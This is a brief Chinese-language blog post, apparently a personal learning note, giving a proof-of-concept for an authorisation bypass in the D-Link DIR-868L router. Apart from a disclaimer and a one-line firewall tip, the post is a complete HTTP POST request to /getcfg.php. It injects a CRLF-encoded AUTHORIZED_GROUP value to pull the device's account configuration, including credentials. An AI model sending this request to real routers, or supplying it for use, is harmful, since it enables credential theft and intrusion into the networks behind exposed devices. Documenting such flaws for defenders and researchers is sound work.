免责声明:

由于传播、利用此文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本文作者不为此承担任何责任。切勿用于未授权测试!本文主要来自日常学习记录!

型号:

D—Link:DIR-868L

Link-DIR-868L.png

该路由器适用于云路由,接入公网IP,可导致外网黑客,入侵内网络设备
目前官方,还没有做出修补回应,多年前的路由器了

防御:

网关防火墙 增加过滤规格

漏洞Poc

POST /getcfg.php HTTP/1.1
Host: IP+端口
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Cookie: uid=XFOB50sMqS
Upgrade-Insecure-Requests: 1
Content-Type:application/x-www-form-urlencoded
Content-Length: 61

SERVICES=DEVICE.ACCOUNT&attack=ture%0D%0AAUTHORIZED_GROUP%3D1

利用图

DIR-868L-Poc.PNG

最后修改:2021 年 08 月 24 日
© 允许规范转载
如果觉得我的文章对你有用,请随意赞赏